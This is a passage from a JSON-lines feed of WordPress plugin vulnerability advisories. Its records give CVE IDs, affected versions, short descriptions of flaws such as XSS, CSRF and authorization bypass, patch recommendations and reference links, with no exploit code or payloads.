replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f3c466-bdeb-402f-bf34-bc703f35e1e2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/33f3c466-bdeb-402f-bf34-bc703f35e1e2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/amazonify\\\/trunk\\\/amazonify.php#L142\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6530","slug":"theme-junkie-shortcodes","versionImpact":"0.1.3","description":"The TJ Shortcodes WordPress plugin through 0.1.3 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e63bf7c-7827-4c4d-b0e3-66354b218bee\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8e63bf7c-7827-4c4d-b0e3-66354b218bee\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6530-tj-shortcodes-stored-xss-poc\\\/\",\"name\":\"https:\\\/\\\/research.cleantalk.org\\\/cve-2023-6530-tj-shortcodes-stored-xss-poc\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1336","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the optimizeAllOn function. This makes it possible for unauthenticated attackers to modify image optimization settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/ca4cf299-9dee-4ebf-83f3-4c3471bd9fb0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0368","slug":"wordpress-popup","versionImpact":"7.8.3","description":"The Hustle \u2013 Email Marketing, Lead Generation, Optins, Popups plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 7.8.3 via hardcoded API Keys. This makes it possible for unauthenticated attackers to extract sensitive data including PII.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d40b41-540d-476d-afde-970845543933?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e6d40b41-540d-476d-afde-970845543933?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#scopes\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"name\":\"https:\\\/\\\/developers.hubspot.com\\\/docs\\\/api\\\/webhooks#manage-settings-via-api\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047775\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup\\\/tags\\\/7.8.3\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3047775\\\/wordpress-popup\\\/trunk\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php?old=3025070&old_path=wordpress-popup\\\/tags\\\/7.8.3\\\/inc\\\/providers\\\/hubspot\\\/hustle-hubspot-api.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10717","slug":"styler-for-ninja-forms-lite","versionImpact":"3.3.4","description":"The Styler for Ninja Forms plugin for WordPress is vulnerable to unauthorized modification of data that can lead to a denial of service due to a missing capability check on the deactivate_license function in all versions up to, and including, 3.3.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary option values on the WordPress site. This can be leveraged to delete an option that would create an error on the site and deny service to legitimate users. Note: This issue can also be used to add arbitrary options with an empty value.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a26da53c-4be0-4c9f-9caf-05f054a6d5e7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a26da53c-4be0-4c9f-9caf-05f054a6d5e7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/styler-for-ninja-forms-lite\\\/tags\\\/3.3.4\\\/admin-menu\\\/licenses.php#L126\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/styler-for-ninja-forms-lite\\\/tags\\\/3.3.4\\\/admin-menu\\\/licenses.php#L126\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1515","slug":"wp-realestate-manager","versionImpact":"2.8","description":"The WP Real Estate Manager plugin for WordPress is vulnerable to Authentication Bypass in all versions up to, and including, 2.8. This is due to insufficient identity verification on the LinkedIn login request process. This makes it possible for unauthenticated attackers to bypass official authentication and log in as any user on the site, including administrators.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/home-villa-real-estate-wordpress-theme\\\/19446059\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/home-villa-real-estate-wordpress-theme\\\/19446059\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f08111-d116-46f9-9765-28966e338753?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/84f08111-d116-46f9-9765-28966e338753?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30609","slug":"appexperts","versionImpact":"1.4.3","description":"Insertion of Sensitive Information Into Sent Data vulnerability in AppExperts AppExperts \u2013 WordPress to Mobile App \u2013 WooCommerce to iOs and Android Apps allows Retrieve Embedded Sensitive Data. This issue affects AppExperts \u2013 WordPress to Mobile App \u2013 WooCommerce to iOs and Android Apps: from n\/a through 1.4.3.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/appexperts\\\/vulnerability\\\/wordpress-appexperts-wordpress-to-mobile-app-woocommerce-to-ios-and-android-apps-1-4-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/appexperts\\\/vulnerability\\\/wordpress-appexperts-wordpress-to-mobile-app-woocommerce-to-ios-and-android-apps-1-4-3-sensitive-data-exposure-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32520","slug":"wp-condition","versionImpact":"4.1.1","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in M. Ali Saleem WordPress Health and Server Condition \u2013 Integrated with Google Page Speed allows Reflected XSS. This issue affects WordPress Health and Server Condition \u2013 Integrated with Google Page Speed: from n\/a through 4.1.1.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-condition\\\/vulnerability\\\/wordpress-wordpress-health-and-server-condition-plugin-4-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-condition\\\/vulnerability\\\/wordpress-wordpress-health-and-server-condition-plugin-4-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0717","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_delete_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35fb658f-6ffa-4df7-bfcd-25307d89fc26\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/35fb658f-6ffa-4df7-bfcd-25307d89fc26\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3459","slug":"users-customers-import-export-for-wp-woocommerce","versionImpact":"2.4.1","description":"The Export and Import Users and Customers plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'hf_update_customer' function called via an AJAX action in versions up to, and including, 2.4.1. This makes it possible for authenticated attackers, with shop manager-level permissions to change user passwords and potentially take over administrator accounts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938705\\\/users-customers-import-export-for-wp-woocommerce#file201\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938705\\\/users-customers-import-export-for-wp-woocommerce#file201\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.1\\\/admin\\\/modules\\\/user\\\/import\\\/import.php#L446\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/users-customers-import-export-for-wp-woocommerce\\\/tags\\\/2.4.1\\\/admin\\\/modules\\\/user\\\/import\\\/import.php#L446\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47337214-9cc3-4b12-bb71-9acbab3649b7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/47337214-9cc3-4b12-bb71-9acbab3649b7?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6503","slug":"wp-plugin-lister","versionImpact":"2.1.0","description":"The WP Plugin Lister WordPress plugin through 2.1.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged in admin add Stored XSS payloads via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d95de23-e8f6-4342-b19c-57cd22b2fee2\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0d95de23-e8f6-4342-b19c-57cd22b2fee2\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6503.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6503.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1335","slug":"imagerecycle-pdf-image-compression","versionImpact":"3.1.13","description":"The ImageRecycle pdf & image compression plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.1.13. This is due to missing or incorrect nonce validation on the disableOptimization function. This makes it possible for unauthenticated attackers to disable the image optimization setting via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b3900e4f-4ae4-4026-89df-b63bd869a763?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3031424\\\/imagerecycle-pdf-image-compression\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9445","slug":"display-medium-posts","versionImpact":"5.0.1","description":"The Display Medium Posts plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's display_medium_posts shortcode in all versions up to, and including, 5.0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1e0216-d9de-45e9-837c-0cccb78729a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/be1e0216-d9de-45e9-837c-0cccb78729a6?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/display-medium-posts\\\/trunk\\\/display-medium-posts.php#L200\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/display-medium-posts\\\/trunk\\\/display-medium-posts.php#L200\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-medium-posts\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/display-medium-posts\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10686","slug":"cf7-styler","versionImpact":"1.6.8","description":"The Design for Contact Form 7 Style WordPress Plugin \u2013 CF7 WOW Styler plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'style_scheme' parameter in all versions up to, and including, 1.6.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00de7a6-b39f-45c9-8b3e-a554dc6e7944?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e00de7a6-b39f-45c9-8b3e-a554dc6e7944?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-styler\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/cf7-styler\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11788","slug":"streamweasels-youtube-integration","versionImpact":"1.3.6","description":"The StreamWeasels YouTube Integration plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'sw-youtube-embed' shortcode in all versions up to, and including, 1.3.6 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197683%40streamweasels-youtube-integration&new=3197683%40streamweasels-youtube-integration&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197683%40streamweasels-youtube-integration&new=3197683%40streamweasels-youtube-integration&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/streamweasels-youtube-integration\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c76e61-f263-459f-8618-7565225467e8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/03c76e61-f263-459f-8618-7565225467e8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12545","slug":"scratch-win-giveaways-for-website-facebook","versionImpact":"2.7.1","description":"The Scratch & Win \u2013 Giveaways and Contests. Boost subscribers, traffic, repeat visits,  referrals, sales and more plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.7.1. This is due to missing nonce validation on the reset_installation() function. This makes it possible for unauthenticated attackers to reset the plugin\u2019s installation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/includes\\\/swin-api.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/scratch-win-giveaways-for-website-facebook\\\/tags\\\/2.7.0\\\/includes\\\/swin-api.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212730\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212730\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scratch-win-giveaways-for-website-facebook\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/scratch-win-giveaways-for-website-facebook\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbc157b-4f1b-4212-9e5c-dd10dd443df7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cbc157b-4f1b-4212-9e5c-dd10dd443df7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0956","slug":"rac","versionImpact":"24.3.0","description":"The WooCommerce Recover Abandoned Cart plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 24.3.0 via deserialization of untrusted input from the 'raccookie_guest_email' cookie. This makes it possible for unauthenticated attackers to inject a PHP Object. No known POP chain is present in the vulnerable software, which means this vulnerability has no impact unless another plugin or theme containing a POP chain is installed on the site. If a POP chain is present via an additional plugin or theme installed on the target system, it may allow the attacker to perform actions like delete arbitrary files, retrieve sensitive data, or execute code depending on the POP chain present.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-recover-abandoned-cart\\\/7715167\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/woocommerce-recover-abandoned-cart\\\/7715167\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067c974c-b3bb-4f06-8f7c-3963112c40d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/067c974c-b3bb-4f06-8f7c-3963112c40d2?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-30608","slug":"wordpress-sql-backup","versionImpact":"3.5.2","description":"Cross-Site Request Forgery (CSRF) vulnerability in Anthony WordPress SQL Backup allows Stored XSS. This issue affects WordPress SQL Backup: from n\/a through 3.5.2.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-sql-backup\\\/vulnerability\\\/wordpress-wordpress-sql-backup-3-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wordpress-sql-backup\\\/vulnerability\\\/wordpress-wordpress-sql-backup-3-5-2-cross-site-request-forgery-csrf-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-27291","slug":"photo-image-gallery","versionImpact":"2.0.4","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in uxgallery WordPress Photo Gallery \u2013 Image Gallery allows Reflected XSS. This issue affects WordPress Photo Gallery \u2013 Image Gallery: from n\/a through 2.0.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/photo-image-gallery\\\/vulnerability\\\/wordpress-photo-gallery-image-gallery-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/photo-image-gallery\\\/vulnerability\\\/wordpress-photo-gallery-image-gallery-plugin-2-0-4-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8216","slug":"sky-elementor-addons","versionImpact":"3.1.4","description":"The Sky Addons for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via Multiple widgets in all versions up to, and including, 3.1.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334452\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3334452\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sky-elementor-addons\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/sky-elementor-addons\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17240221-01b2-4a21-9e9f-f940280c0fb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17240221-01b2-4a21-9e9f-f940280c0fb7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0716","slug":"wicked-folders","versionImpact":"2.18.16","description":"The Wicked Folders plugin for WordPress is vulnerable to authorization bypass due to a missing capability check on the ajax_edit_folder function in versions up to, and including, 2.18.16. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to invoke this function and perform actions intended for administrators such as modifying the folder structure maintained by the plugin.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wicked-folders\\\/tags\\\/2.18.16\\\/lib\\\/class-wicked-folders-ajax.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad60a11-e307-4ec9-9099-091a87ff1d3b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3ad60a11-e307-4ec9-9099-091a87ff1d3b\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2860994%40wicked-folders%2Ftrunk&old=2805161%40wicked-folders%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3403","slug":"profilegrid-user-profiles-groups-and-communities","versionImpact":"5.5.1","description":"The ProfileGrid plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'pm_upload_csv' function in versions up to, and including, 5.5.1. This makes it possible for authenticated attackers, with subscriber-level permissions or above to import new users and update existing users.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335fc19-2998-4711-8813-6cb68d7447bd?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b335fc19-2998-4711-8813-6cb68d7447bd?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L1027\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/profilegrid-user-profiles-groups-and-communities\\\/tags\\\/5.4.8\\\/admin\\\/class-profile-magic-admin.php#L1027\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2938904\\\/profilegrid-user-profiles-groups-and-communities#file0\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6391","slug":"custom-user-css","versionImpact":"0.2","description":"The Custom User CSS WordPress plugin through 0.2 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4098b18d-6ff3-462c-af05-48adb6599cf3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4098b18d-6ff3-462c-af05-48adb6599cf3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6391.txt\",\"name\":\"https:\\\/\\\/magos-securitas.com\\\/txt\\\/CVE-2023-6391.txt\",\"refsource\":\"\",\"tags\":[]}]"}
